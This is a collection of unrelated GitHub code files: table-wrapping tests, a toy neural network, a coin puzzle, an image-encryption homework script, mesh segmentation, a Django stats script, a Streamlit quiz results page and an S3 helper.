\"+--------------------------------------------------------\"\n \"+--------------------------------------------------------+\\n\"\n \"|Lorem ipsum dolor sit amet, consectetur adipisicing elit\"\n \"|Lorem ipsum dolor sit amet, consectetur adipisicing elit|\\n\"\n \"+--------------------------------------------------------\"\n \"+--------------------------------------------------------+\"\n )\n\n\ndef test_wrap_multiline() -> None:\n tbl = Txtble([[\"Lorem ipsum\\n\" + LONG_STRING]], widths=[20])\n assert str(tbl) == (\n \"+--------------------+\\n\"\n \"|Lorem ipsum |\\n\"\n \"|Lorem ipsum dolor |\\n\"\n \"|sit amet, |\\n\"\n \"|consectetur |\\n\"\n \"|adipisicing elit |\\n\"\n \"+--------------------+\"\n )\n\n\ndef test_wrap_fullwidth() -> None:\n tbl = Txtble(\n [[\"Lorem ipsum dolor sit amet\"]],\n widths=[30],\n )\n assert str(tbl) == (\n \"+------------------------------+\\n\"\n \"|Lorem ipsum |\\n\"\n \"|dolor sit amet |\\n\"\n \"+------------------------------+\"\n )\n\n\ndef test_wrap_fullwidth_long_word() -> None:\n tbl = Txtble(\n [[\"antidisestablishmentarianism\"]],\n widths=[30],\n )\n assert str(tbl) == (\n \"+------------------------------+\\n\"\n \"|antidisestablis|\\n\"\n \"|hmentarianism |\\n\"\n \"+------------------------------+\"\n )\n\n\ndef test_wrap_combining() -> None:\n tbl = Txtble(\n [\n [\n \"L\\u0301o\\u0301r\\u0301e\\u0301m\\u0301\"\n \" i\\u0301p\\u0301s\\u0301u\\u0301m\\u0301\"\n \" d\\u0301o\\u0301l\\u0301o\\u0301r\\u0301\"\n \" s\\u0301i\\u0301t\\u0301\"\n \" a\\u0301m\\u0301e\\u0301t\\u0301\"\n ],\n ],\n widths=[30],\n )\n assert str(tbl) == (\n \"+------------------------------+\\n\"\n \"|L\\u0301o\\u0301r\\u0301e\\u0301m\\u0301\"\n \" i\\u0301p\\u0301s\\u0301u\\u0301m\\u0301\"\n \" d\\u0301o\\u0301l\\u0301o\\u0301r\\u0301\"\n \" s\\u0301i\\u0301t\\u0301\"\n \" a\\u0301m\\u0301e\\u0301t\\u0301 |\\n\"\n \"+------------------------------+\"\n )\n\n\ndef test_wrap_fullwidth_builtin_len() -> None:\n tbl = Txtble(\n [[\"Lorem ipsum dolor sit amet\"]],\n len_func=len,\n widths=[30],\n )\n assert str(tbl) == (\n \"+------------------------------+\\n\"\n \"|Lorem ipsum dolor sit amet |\\n\"\n \"+------------------------------+\"\n )\n\n\ndef test_wrap_combining_builtin_len() -> None:\n tbl = Txtble(\n [\n [\n \"L\\u0301o\\u0301r\\u0301e\\u0301m\\u0301\"\n \" i\\u0301p\\u0301s\\u0301u\\u0301m\\u0301\"\n \" d\\u0301o\\u0301l\\u0301o\\u0301r\\u0301\"\n \" s\\u0301i\\u0301t\\u0301\"\n \" a\\u0301m\\u0301e\\u0301t\\u0301\"\n ],\n ],\n len_func=len,\n widths=[30],\n )\n assert str(tbl) == (\n \"+------------------------------+\\n\"\n \"|L\\u0301o\\u0301r\\u0301e\\u0301m\\u0301 i\\u0301p\\u0301s\\u0301u\\u0301m\\u0301 |\\n\"\n \"|d\\u0301o\\u0301l\\u0301o\\u0301r\\u0301 s\\u0301i\\u0301t\\u0301 a\\u0301m\\u0301e\\u0301t\\u0301 |\\n\"\n \"+------------------------------+\"\n )\n\n\ndef test_wrap_padding() -> None:\n tbl = Txtble([[LONG_STRING]], padding=2, widths=[30])\n assert str(tbl) == (\n \"+----------------------------------+\\n\"\n \"| Lorem ipsum dolor sit amet, |\\n\"\n \"| consectetur adipisicing elit |\\n\"\n \"+----------------------------------+\"\n )\n\n\n@pytest.mark.parametrize(\"s\", [LONG_STRING, \"\"])\n@pytest.mark.parametrize(\"width\", [-42, 0, \"\", \"q\"])\ndef test_invalid_width(s: str, width: int | str) -> None:\n tbl = Txtble([[s]], widths=[width]) # type: ignore[list-item]\n with pytest.raises((TypeError, ValueError)):\n str(tbl)\n\n\ndef test_wrap_header() -> None:\n tbl = Txtble([[LONG_STRING]], headers=[LONG_STRING], widths=[20])\n 
assert str(tbl) == (\n \"+--------------------+\\n\"\n \"|Lorem ipsum dolor |\\n\"\n \"|sit amet, |\\n\"\n \"|consectetur |\\n\"\n \"|adipisicing elit |\\n\"\n \"+--------------------+\\n\"\n \"|Lorem ipsum dolor |\\n\"\n \"|sit amet, |\\n\"\n \"|consectetur |\\n\"\n \"|adipisicing elit |\\n\"\n \"+--------------------+\"\n )\n\n\ndef test_wrap_none_str() -> None:\n tbl = Txtble([[None]], none_str=LONG_STRING, widths=[20])\n assert str(tbl) == (\n \"+--------------------+\\n\"\n \"|Lorem ipsum dolor |\\n\"\n \"|sit amet, |\\n\"\n \"|consectetur |\\n\"\n \"|adipisicing elit |\\n\"\n \"+--------------------+\"\n )\n\n\ndef test_wrap_header_fill_row_fill() -> None:\n tbl = Txtble(\n [[\"foo\"], [\"bar\", \"baz\"]],\n header_fill=LONG_STRING,\n headers=[\"Quux\"],\n row_fill=LONG_STRING,\n widths=[None, 20],\n )\n assert str(tbl) == (\n \"+----+--------------------+\\n\"\n \"|Quux|Lorem ipsum dolor |\\n\"\n \"| |sit amet, |\\n\"\n \"| |consectetur |\\n\"\n \"| |adipisicing elit |\\n\"\n \"+----+--------------------+\\n\"\n \"|foo |Lorem ipsum dolor |\\n\"\n \"| |sit amet, |\\n\"\n \"| |consectetur |\\n\"\n \"| |adipisicing elit |\\n\"\n \"|bar |baz |\\n\"\n \"+----+--------------------+\"\n )\n\n\ndef test_wrap_empty() -> None:\n tbl = Txtble([[\"\"]], widths=[20])\n assert (\n str(tbl)\n == \"+--------------------+\\n| |\\n+--------------------+\"\n )\n\n\ndef test_wrap_long_word_short_words() -> None:\n tbl = Txtble(\n [['\"Antidisestablishmentarianism\" is not that hard to spell.']],\n widths=[20],\n )\n assert str(tbl) == (\n \"+--------------------+\\n\"\n '|\"Antidisestablishmen|\\n'\n '|tarianism\" is not |\\n'\n \"|that hard to spell. |\\n\"\n \"+--------------------+\"\n )\n\n\ndef test_wrap_long_word_short_words_no_break_long_words() -> None:\n tbl = Txtble(\n [['\"Antidisestablishmentarianism\" is not that hard to spell.']],\n break_long_words=False,\n widths=[20],\n )\n assert str(tbl) == (\n \"+------------------------------+\\n\"\n '|\"Antidisestablishmentarianism\"|\\n'\n \"|is not that hard to |\\n\"\n \"|spell. |\\n\"\n \"+------------------------------+\"\n )\n\n\n@pytest.mark.parametrize(\"hyph_break\", [True, False])\ndef test_wrap_hyphen_after_width(hyph_break: bool) -> None:\n tbl = Txtble(\n [[\"Antidisestablishmentarianism-length words are hard to wrap.\"]],\n break_on_hyphens=hyph_break,\n widths=[20],\n )\n assert str(tbl) == (\n \"+--------------------+\\n\"\n \"|Antidisestablishment|\\n\"\n \"|arianism-length |\\n\"\n \"|words are hard to |\\n\"\n \"|wrap. |\\n\"\n \"+--------------------+\"\n )\n\n\ndef test_wrap_hyphen_after_width_no_break_long_words() -> None:\n tbl = Txtble(\n [[\"Antidisestablishmentarianism-length words are hard to wrap.\"]],\n break_long_words=False,\n widths=[20],\n )\n assert str(tbl) == (\n \"+-----------------------------+\\n\"\n \"|Antidisestablishmentarianism-|\\n\"\n \"|length words are |\\n\"\n \"|hard to wrap. 
|\\n\"\n \"+-----------------------------+\"\n )\n\n\ndef test_wrap_even_multiple() -> None:\n tbl = Txtble(\n [['\"The time has come,\" the Walrus said, \"To talk of many things\"']],\n widths=[20],\n )\n assert str(tbl) == (\n \"+--------------------+\\n\"\n '|\"The time has come,\"|\\n'\n '|the Walrus said, \"To|\\n'\n '|talk of many things\"|\\n'\n \"+--------------------+\"\n )\n\n\ndef test_wrap_before_trailing_space() -> None:\n tbl = Txtble([['\"The time has come.\" ']], widths=[20])\n assert str(tbl) == (\n \"+--------------------+\\n\"\n '|\"The time has come.\"|\\n'\n \"| |\\n\"\n \"+--------------------+\"\n )\n\n\ndef test_wrap_bad_len_func() -> None:\n width = 20\n\n def len_func(s: str) -> int:\n return -1 if 0 < len(s) <= width else len(s)\n\n tbl = Txtble([[LONG_STRING]], len_func=len_func, widths=[width])\n with pytest.raises(IndeterminateWidthError):\n str(tbl)\n\n\ndef test_wrap_implementation_bsearch_boundary() -> None:\n \"\"\"\n Test a boundary condition in the implementation of the long-word-splitting\n algorithm\n \"\"\"\n tbl = Txtble([[\"antidisestablishme\\u0301n\\uFF54arianism\"]], widths=[20])\n assert str(tbl) == (\n \"+--------------------+\\n\"\n \"|antidisestablishme\\u0301n |\\n\"\n \"|\\uFF54arianism |\\n\"\n \"+--------------------+\"\n )\n\n\n# vim:set nowrap:\n","repo_name":"jwodder/txtble","sub_path":"test/test_wrap.py","file_name":"test_wrap.py","file_ext":"py","file_size_in_byte":21158,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"72"} +{"seq_id":"16952890322","text":"\nimport numpy as np\n\nfrom src import Layer,dataHandler\n\n\n\nclass Model:\n def __init__(self, lr, epochs,output_size,batch_size=64):\n self.lr = lr\n self.epochs = epochs\n self.output_size = output_size\n self.batch_size = batch_size \n \n def layer_init(self):\n\n self.Layers=[\n Layer.Input(None),\n\n\n Layer.Dense(self.input_size, 20, activation=\"relu\"),\n Layer.Dense(20, 10, activation=\"relu\"),\n Layer.Dense(10, 10, activation=\"relu\"),\n Layer.Dense(10,self.output_size, activation=\"softmax\"),\n\n\n Layer.Output(None)\n ]\n \n \n \n def forward(self):\n for i,layer in enumerate(self.Layers):\n if i!=0 and i!=len(self.Layers) -1:\n layer.forward()\n\n def backward(self):\n for i,layer in enumerate(reversed(self.Layers)):\n if i!=0 and i!=len(self.Layers) -1:\n layer.backward()\n\n def update(self,lr):\n for i,layer in enumerate(self.Layers):\n if i!=0 and i!=len(self.Layers) -1:\n layer.update(lr)\n \n def flush(self):\n for i,layer in enumerate(self.Layers):\n if i!=0 and i!=len(self.Layers) -1:\n layer.flush()\n\n def get_predictions(self): \n return np.argmax(self.Layers[len(self.Layers) -2].output, 0) \n\n def get_accuracy(self,predictions, Y): \n return np.sum(predictions == Y) / Y.size \n\n def fit(self, X, Y,diagnostics=True,plot=False,save_best_model=True): \n self.input_size = X.shape[0] \n prevAccuracy = 0.0\n batches_X = np.array_split(X,self.batch_size,axis=1)\n batches_Y = np.array_split(Y,self.batch_size,axis=0)\n self.layer_init()\n for epoch in range(self.epochs):\n for i,batch in enumerate(batches_X):\n self.X = batch\n self.Y = batches_Y[i]\n self.Layers[0] = Layer.Input(self.X)\n self.Layers[-1] = Layer.Output(self.Y)\n Layer.compile(self.Layers,self.Y)\n\n\n self.forward()\n self.backward()\n self.update(self.lr)\n #self.flush()\n\n predictions = self.get_predictions()\n accuracy = self.get_accuracy(predictions, self.Y)\n\n model_paramaters = self.Layers[1:-1]\n if accuracy>0.80 and 
accuracy>prevAccuracy and save_best_model:\n Wb = self.Layers[1:-1]\n dataHandler.writeData(Wb)\n prevAccuracy=accuracy\n\n ################################ DEBUGGING ###########################\n if diagnostics:\n #if i%8 == 0:\n # print(\"Batch: \",i*len(self.Y))\n if epoch % 50 == 0 and i==0: \n \n print(\"\\rEpoch: \", epoch)\n print(np.asarray(((np.unique(predictions, return_counts=True)))).T)\n print(np.asarray(((np.unique(self.Y, return_counts=True)))).T)\n \n print(\"Accuracy: \", accuracy)\n print(\"Max Accuracy: \",prevAccuracy)\n print(\"------------------------\\n\")\n ################################ DEBUGGING ###########################\n \n \n print(\"Max acc: \", prevAccuracy)\n \n \n return model_paramaters\n def evaluate(self,X,Y, W1, b1, W2, b2):\n\n _,_,_, A2 = self.forward(X,W1, b1, W2, b2)\n predictions = self.get_predictions(A2)\n return self.get_accuracy(predictions, Y)\n\n def predict(self,X,W1,b1,W2,b2):\n Z1 = W1.dot(X) + b1 \n A1 = self.ReLU(Z1) \n Z2 = W2.dot(A1) + b2 \n A2 = self.softmax(Z2) \n \n return Z2\n\n def load(path): #rework\n data = []\n with open(path) as file:\n lines = file.readlines()\n \n for i in lines:\n \n i = i.replace(\"\\n\",\"\")\n \n data.append(i)\n data = np.array((data)).reshape(len(data),-1)\n return data\n\n","repo_name":"Skeibol/ToNNi-Neural-Network","sub_path":"old/ToNNi.py","file_name":"ToNNi.py","file_ext":"py","file_size_in_byte":4328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"818334879","text":"# The trick to realise here is that the two groups don't have to be the same size.\n# Instead let's split them into a big pile of 90 coins and a small pile of 10 coins.\n# We don't know how many heads are in either pile, it couĺd be anywhere from 0 to 10.\n# Let's say there are n heads in the large pile. That leaves 10-n heads in the small pile.\n# If we turn over all of the coins in the small pile we get 10-(10-n) heads which simplifies to n.\n# Therefore both piles will have the same number of heads as each other,\n# even though we don't know how many (if any) that is.\n#\n\n# ( 0 tail) (1 head)\ndef heads_tails(h, t):\n head = \"1\" * h\n\n tail = \"0\" * t\n\n coins = head + tail\n\n print(coins)\n\n list1 = coins[:t]\n list2 = coins[t:]\n print(list1)\n print(list2)\n\n ans = []\n for i in list2:\n if i == \"0\":\n ans.append(1)\n else:\n ans.append(0)\n\n print(ans)\n\n\n# Num_Heads = 10\n# Num_Tails = 90\n\nNum_Heads = int(input(\"Enter number of heads\"))\nNum_Tails = int(input(\"Enter number of tails\"))\nheads_tails(Num_Heads, Num_Tails)\n\n","repo_name":"ahmaddroobi99/Security_Project_2022","sub_path":"CoinProblemSimu.py","file_name":"CoinProblemSimu.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36331456642","text":"import sys\nimport base64\nfrom aead import AEAD as a\nimport os\nimport logging\n\n# disclaimer: if you get the incorrect padding error when running this program, please\n# delete the header and body output files and run it again.\n# This might take a few tries, I have no idead why this happens, since our decode\n# function should not raise exceptions. 
Also, I have no idea why rerunning the program makes\n# this work, but it does.\n\n\n# copied from https://stackoverflow.com/questions/2941995/python-ignore-incorrect-padding-error-when-base64-decoding\n# because I kept on getting the error 'Incorrect padding'\ndef base64_decode(s):\n \"\"\"Add missing padding to string and return the decoded base64 string.\"\"\"\n log = logging.getLogger()\n s = str(s).strip()\n try:\n return base64.b64decode(s)\n except TypeError:\n padding = len(s) % 4\n if padding == 1:\n log.error(\"Invalid base64 string: {}\".format(s))\n return ''\n elif padding == 2:\n s += b'=='\n elif padding == 3:\n s += b'='\n return base64.b64decode(s)\n\n\ndef read_file(path):\n\tfile = open(path, \"rb\")\n\tbytes = file.read()\n\tfile.close()\n\treturn bytes\n\t\n\ndef write(bytes, path):\n\tfile = open(path, \"wb\")\n\tfile.write(bytes)\n\tfile.close()\n\n\n# first we create copy header of the penguin in the file 'header'\nos.system(\"head -c 54 tux.bmp >> header\")\n\n# and the content itself in a the file 'body'\nos.system(\"tail -c +54 tux.bmp >> body\")\n\nSECRET_KEY = \"Gzb9X-EAiZsk5-7OVZe0KrwIiLxySqYWfJFyyDtPf4w=\"\n\n# we initialize a cryptorr with our secret key\ncryptor = a(SECRET_KEY)\n\n# read the contents of the header and body files just created\nheader = read_file(\"header\")\nbody = read_file(\"body\")\n\n# encrypt the content of the body and sign the header\ncipher_text = cryptor.encrypt(body, header)\n\n\n# unfortunately ciper text is in base64, so we must convert it to binary\n# We can't just use base64.b64decode(s) because the padding is\n# incorrect, so we use a dedicated function\ncipher_text = base64_decode(cipher_text)\n\n# we write the bytes into 'out'\nwrite(cipher_text, \"out\")\n\n# create the image\nos.system(\"touch img.bmp\")\n\n# append the header to the image\nos.system(\"cat header >> img.bmp\")\n\n# append the encrypted body to the image\nos.system(\"cat out >> img.bmp\")\n\n\n# do some manipulations to the associated data\n# cipher_text = ~cipher_text\n\n# we can't because cipher_text is stored as a string ...\n# we tried\n# eval(\"cipher_text = b{}\".format(cipher_text))\n# cipher_text = cipher_text.encode()\n# cipher_text = str.encode(cipher_text)\n# and many more\n# NOTHING WORKS\n\n# thus there is no point in executing the following\n#os.system(\"touch img2.bmp\")\n#os.system(\"cat header >> img2.bmp\")\n#os.system(\"cat out >> img2.bmp\")\n\n\n# file cleaning\nos.system(\"rm out\")\nos.system(\"rm header\")\nos.system(\"rm body\")\n","repo_name":"TravisPetit/ias","sub_path":"s3/a3/a3.py","file_name":"a3.py","file_ext":"py","file_size_in_byte":2833,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"43177840288","text":"import math\r\nimport numpy as np\r\nimport scipy.linalg\r\nimport scipy.cluster\r\nimport scipy.sparse\r\nimport scipy.sparse.csgraph\r\nimport scipy.sparse.linalg\r\nfrom mathutils import Vector\r\n\r\n# Code from https://github.com/kugelrund/mesh_segmentation\r\n# Changed mesh segmentation to work with trimesh library\r\n\r\n\r\ndef _face_center(mesh, face):\r\n \"\"\"Computes the coordinates of the center of the given face\"\"\"\r\n center = Vector()\r\n for vert in face.verts:\r\n center += mesh.vertices[vert.index].co\r\n return center/len(face.verts)\r\n\r\n\r\ndef _geodesic_distance(mesh, face1, face2, edge):\r\n \"\"\"Computes the geodesic distance over the given edge between\r\n the two adjacent faces face1 and face2\"\"\"\r\n edge_center = 
(mesh.vertices[edge[0]].co + mesh.vertices[edge[1]].co)/2\r\n return np.linalg.norm(edge_center - _face_center(mesh, face1)) + \\\r\n np.linalg.norm(edge_center - _face_center(mesh, face2))\r\n\r\n\r\ndef _angular_distance(mesh, face1, face2, face1_ind, face2_ind):\r\n \"\"\"Computes the angular distance of the given adjacent faces\"\"\"\r\n norm_1 = mesh.faces[face1_ind].normal\r\n norm_2 = mesh.faces[face2_ind].normal\r\n proj = np.dot(norm_1, norm_2)\r\n angle = np.arccos(proj)\r\n angular_distance = (1 - math.cos(angle))\r\n if(np.dot(_face_center(mesh, face2), _face_center(mesh, face1)) < 0):\r\n angular_distance *= eta\r\n return angular_distance\r\n\r\ndef _create_face_distance_matrix(mesh, delta):\r\n \"\"\"Creates the matrix of the angular and geodesic distances\r\n between all adjacent faces. The i,j-th entry of the returned\r\n matrices contains the distance between the i-th and j-th face.\r\n \"\"\"\r\n # helping vectors to create sparse matrix later on\r\n row_indices = []\r\n col_indices = []\r\n Gval = [] # values for matrix of angular distances\r\n Aval = [] # values for matrix of geodesic distances\r\n # iterate adjacent faces and calculate distances\r\n parts = mesh.faces\r\n l = len(parts)\r\n for edge in mesh.edges:\r\n adj = edge.link_faces\r\n if len(adj) != 2: continue\r\n i, j = adj[0].index, adj[1].index\r\n cmp1, cmp2 = parts[i], parts[j]\r\n Gtemp = _geodesic_distance(mesh, cmp1, cmp2, [e.index for e in edge.verts])\r\n Atemp = _angular_distance(mesh, cmp1, cmp2, i, j)\r\n Gval += [Gtemp, Gtemp]\r\n Aval += [Atemp, Atemp]\r\n row_indices += [i, j]\r\n col_indices += [j, i] # add symmetric entry\r\n\r\n Gval = np.array(Gval)\r\n Gval /= np.mean(Gval)\r\n Aval = np.array(Aval) \r\n Aval /= np.mean(Aval)\r\n values = delta * Gval + (1.0 - delta) * Aval\r\n distance_matrix = scipy.sparse.csr_matrix((values, (row_indices, col_indices)), shape=(l, l))\r\n return distance_matrix\r\n\r\ndef _create_vert_distance_matrix(mesh):\r\n # helping vectors to create sparse matrix later on\r\n row_indices = []\r\n col_indices = []\r\n Dval = [] # values for matrix of edge length\r\n # iterate adjacent faces and calculate distances\r\n parts = mesh.verts\r\n l = len(parts)\r\n for edge in mesh.edges:\r\n adj = edge.verts\r\n if len(adj) != 2: print(\"[!] 
Non-exclusive adjacency in dist matrix\")\r\n i, j = adj[0].index, adj[1].index\r\n Dtemp = edge.calc_length()\r\n Dval += [Dtemp, Dtemp]\r\n row_indices += [i, j]\r\n col_indices += [j, i] # add symmetric entry\r\n\r\n values = np.array(Dval) / np.mean(Dval)\r\n distance_matrix = scipy.sparse.csr_matrix((values, (row_indices, col_indices)), shape=(l, l))\r\n return distance_matrix\r\n\r\n\r\ndef _create_distance_matrix(mesh, delta=0.5, struct='faces'):\r\n \"\"\"Creates distance matrix\"\"\"\r\n if struct == 'faces':\r\n return _create_face_distance_matrix(mesh, delta), len(mesh.faces)\r\n elif struct == 'verts':\r\n return _create_vert_distance_matrix(mesh), len(mesh.verts)\r\n\r\ndef _create_affinity_matrix(mesh, struct='faces'):\r\n \"\"\"Create the adjacency matrix of the given mesh\"\"\"\r\n\r\n print(f\"segmentation: Creating {struct} distance matrices...\")\r\n distance_matrix, length = _create_distance_matrix(mesh, struct=struct)\r\n\r\n print(\"segmentation: Finding shortest paths between all faces...\")\r\n # for each non adjacent pair of faces find shortest path of adjacent faces\r\n W = scipy.sparse.csgraph.dijkstra(distance_matrix)\r\n inf_indices = np.where(np.isinf(W))\r\n W[inf_indices] = 0\r\n\r\n print(\"segmentation: Creating affinity matrix...\")\r\n # change distance entries to similarities\r\n sigma = W.sum()/(length ** 2)\r\n den = 2 * (sigma ** 2)\r\n W = np.exp(-W/den)\r\n W[inf_indices] = 0\r\n np.fill_diagonal(W, 1)\r\n\r\n return W\r\n\r\n\r\ndef _initial_guess(Q, k):\r\n \"\"\"Computes an initial guess for the cluster-centers\r\n Chooses indices of the observations with the least association to each\r\n other in a greedy manner. Q is the association matrix of the observations.\r\n \"\"\"\r\n\r\n # choose the pair of indices with the lowest association to each other\r\n min_indices = np.unravel_index(np.argmin(Q), Q.shape)\r\n\r\n chosen = [min_indices[0], min_indices[1]]\r\n for _ in range(2, k):\r\n # Take the maximum of the associations to the already chosen indices for\r\n # every index. 
The index with the lowest such result is therefore the\r\n        # least similar to the already chosen pivots, so we take it.\r\n        # Note that we will never get an index that was already chosen because\r\n        # an index always has the highest possible association 1.0 to itself\r\n        new_index = np.argmin(np.max(Q[chosen, :], axis=0))\r\n        chosen.append(new_index)\r\n\r\n    return chosen\r\n\r\ndef get_gl_eigvs(mesh, k, ev_method='dense', struct='faces', normalized=False, verbose=False):\r\n    '''\r\n    Perform spectral decomposition by decomposing Graph Laplacian\r\n    https://www.cs.cmu.edu/~epxing/Class/10701-08s/Lecture/lecture23-Spectral.pdf\r\n    '''\r\n    # affinity matrix\r\n    W = _create_affinity_matrix(mesh, struct)\r\n\r\n    if verbose: print(\"segmentation: Calculating graph laplacian...\")\r\n\r\n    D = W.sum(1)\r\n    # degree matrix -> graph laplacian\r\n    Dsqrt = np.sqrt(np.reciprocal(D)) ## RuntimeWarning: invalid value encountered in reciprocal\r\n    L = ((W * Dsqrt).transpose() * Dsqrt).transpose()\r\n\r\n    if verbose: print(\"segmentation: Calculating eigenvectors...\")\r\n    # get eigenvectors\r\n    if ev_method == 'dense':\r\n        _, V = scipy.linalg.eigh(L, eigvals=(L.shape[0] - k, L.shape[0] - 1))\r\n    else:\r\n        _, V = scipy.sparse.linalg.eigsh(L, k)\r\n    return V\r\n\r\ndef get_spectral_coeffs(verts, V):\r\n    return V.transpose() @ verts\r\n\r\ndef from_spectral_coeffs(coeffs, V):\r\n    return coeffs @ V\r\n\r\ndef segment_mesh(mesh, k, coefficients, action, ev_method, kmeans_init):\r\n    \"\"\"\r\n    Segments the given mesh into k clusters and performs the given\r\n    action for each cluster\r\n    \"\"\"\r\n\r\n    # set coefficients\r\n    global delta\r\n    global eta\r\n    delta, eta = coefficients\r\n\r\n    # affinity matrix\r\n    V = get_gl_eigvs(mesh, k, ev_method=ev_method, verbose=True)\r\n\r\n    # normalize each row to unit length\r\n    V /= np.linalg.norm(V, axis=1)[:, None]\r\n\r\n    if kmeans_init == 'kmeans++':\r\n        print(\"segmentation: Applying kmeans...\")\r\n        _, idx = scipy.cluster.vq.kmeans2(V, k, minit='++', iter=50)\r\n    else:\r\n        print(\"segmentation: Preparing kmeans...\")\r\n        # compute association matrix\r\n        Q = V.dot(V.transpose())\r\n        # compute initial guess for clustering\r\n        initial_centroids = _initial_guess(Q, k)\r\n\r\n        print(\"segmentation: Applying kmeans...\")\r\n        _, idx = scipy.cluster.vq.kmeans2(V, V[initial_centroids, :], iter=50)\r\n\r\n    print(\"segmentation: Done clustering!\")\r\n    # perform action with the clustering result\r\n    return idx\r\n","repo_name":"VKudlay/LTV-MeshPoseTransfer","sub_path":"segmentation.py","file_name":"segmentation.py","file_ext":"py","file_size_in_byte":7703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42608964284","text":"#!/projects/env/bin/python\n###!/Users/elijah/.virtualenvs/lengaenv/bin/python\nimport os\nimport sys\n\n\n# sys.path.append(\"/Users/elijah/Projects/LENGA/backend/live20201102/lenga\")\n\n\nsys.path.append(\"/api/lenga\")\n\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"lenga.settings.base\")\n\nimport django\n\ndjango.setup()\n\nimport pytz\nfrom datetime import date, datetime\nfrom lenga.settings.local import EXCLUDE_START_DATE\nfrom lenga.settings.local import TEST_USERS_LIST\nfrom users.models import User\nfrom learning.models import Category\nfrom data_tracking.models import LessonsStartedStats, ModulesStartedStats\n\n\n\n\ndef time_to_eat(start_time, timezone=\"Africa/Kigali\"):\n    start_time = datetime.strptime(start_time, '%Y-%m-%d %H:%M:%S.%f %z')\n    utcmoment = 
start_time.replace(tzinfo=pytz.utc)\n localDatetime = utcmoment.astimezone(pytz.timezone(timezone))\n start_time = localDatetime.strftime(\"%Y-%m-%d %H:%M:%S\")\n return datetime.strptime(start_time, '%Y-%m-%d %H:%M:%S')\n\ndef create_data():\n\n modules = Category.objects.all()\n users = User.objects.filter(is_active=True).exclude(\n username__icontains='test'\n ).exclude(first_name__in=TEST_USERS_LIST).exclude(\n created__date__lt=EXCLUDE_START_DATE\n )\n for user in users:\n for module in modules:\n started_lessons = LessonsStartedStats.objects.filter(\n lesson__category=module, user=user\n ).exclude(\n user__username__icontains='test'\n ).exclude(user__first_name__in=TEST_USERS_LIST).exclude(\n created__date__lt=EXCLUDE_START_DATE\n )\n if started_lessons:\n start_times_list = []\n for sl in started_lessons:\n start_times_list.append(sl.start_date)\n start_date = min(start_times_list)\n try:\n ModulesStartedStats.objects.get_or_create(\n module=module,\n user=user,\n start_date=start_date\n )\n except Exception as e:\n print(\"Module started check error:\", e)\n\n\ncreate_data()\n","repo_name":"thierrymanzi/lengaproject","sub_path":"auto_6_create_modules_started_stats.py","file_name":"auto_6_create_modules_started_stats.py","file_ext":"py","file_size_in_byte":2224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12360928601","text":"import streamlit as st\r\nfrom uility import set_page, cheering_sound\r\nfrom streamlit_extras.colored_header import colored_header\r\nfrom streamlit_extras.switch_page_button import switch_page\r\n\r\nset_page()\r\n\r\ndef congratz_page():\r\n language = st.session_state['language']\r\n st.image(\"https://animatedimagepic.com/image/congratulations/congratulations-4308.gif\")\r\n if st.session_state['scores'] == 2:\r\n if language == 'english':\r\n st.header(\"You have full scores!! \")\r\n st.header(\"Well Done!!\")\r\n elif language == 'chinese':\r\n st.header(\"恭喜您拿到满分!!\")\r\n elif st.session_state['scores'] == 1:\r\n if language == 'english':\r\n st.header(f\"You have scored {st.session_state['scores']}\")\r\n st.header(\"Keep up the good work!!\")\r\n elif language == 'chinese':\r\n st.header(f\"恭喜!您的总分是{st.session_state['scores']}分\")\r\n elif st.session_state['scores'] == 0:\r\n if language == 'english':\r\n st.header(\"You have not scored any points\")\r\n st.header(\"Don't Worry! 
Keep Trying!!\")\r\n st.header(\"You can approach any of our Digital Ambassador to learn more\")\r\n elif language == 'chinese':\r\n st.header(\"抱歉!您没有得分\")\r\n st.header(\"没关系!继续努力!\")\r\n st.header(\"您可以联系我们的数字大使以了解更多信息\")\r\n st.balloons()\r\n cheering_sound()\r\n if language == 'english':\r\n st.subheader(\"Book an appointment with us to learn more digital skills\")\r\n st.success(\"Geylang East Public Library - Hotline: 89401782 - 1pm to 6pm\")\r\n st.success(\"Macpherson Community Centre - Hotline: 89401662 - 10am to 6pm\")\r\n st.success(\"Kembangan Community Centre - Hotline: 91392414\")\r\n elif language == 'chinese':\r\n st.subheader(\"欢迎与我们预约以了解更多数字技能\")\r\n st.success(\"亚龙图书馆(Geylang East Library) - 热线: 89401782 - 下午1点到6点 \")\r\n st.success(\"麦波申社区中心(Macpherson CC) - 热线: 89401662 - 早上10点到下午6点\")\r\n st.success(\"景万岸社区中心(Kembangan CC) - 热线: 91392414\")\r\n submit_qns = st.button(\"RESET\")\r\n if submit_qns:\r\n del st.session_state['scores']\r\n del st.session_state['correctness']\r\n del st.session_state['df']\r\n del st.session_state['scam_question_list']\r\n del st.session_state['scam_operation']\r\n switch_page(\"home\")\r\n\r\n\r\ncongratz_page()\r\n\r\n","repo_name":"SteveDataAnalyst/2_questions","sub_path":"pages/congratz.py","file_name":"congratz.py","file_ext":"py","file_size_in_byte":2553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19578989281","text":"import boto3\nimport source.commons.environment as environment\nimport datetime\n\n\nclass S3Helper:\n\n def __init__(self):\n self.client = boto3.client('s3')\n\n def upload_file(self, file, key, extra_args=None):\n with open(file, 'rb') as f:\n self.client.upload_fileobj(f, environment.AWS_S3_BUCKET, key, ExtraArgs=extra_args)\n\n\n def s3_write(self, file_object):\n try:\n resource = boto3.resource('s3')\n filename = f'export_{datetime.datetime.now().strftime(\"%m_%d_%Y_%H_%M_%S\")}.xlsx'\n s3_object = resource.Object(bucket_name=environment.AWS_S3_BUCKET_EXPORT, key=filename)\n s3_response = s3_object.put(Body=file_object, ACL='public-read')\n s3_object.wait_until_exists()\n print(s3_response)\n return \"https://{0}.s3.amazonaws.com/{1}\".format(environment.AWS_S3_BUCKET_EXPORT, filename)\n except Exception as e:\n print(\"---------------------------------------------\")\n 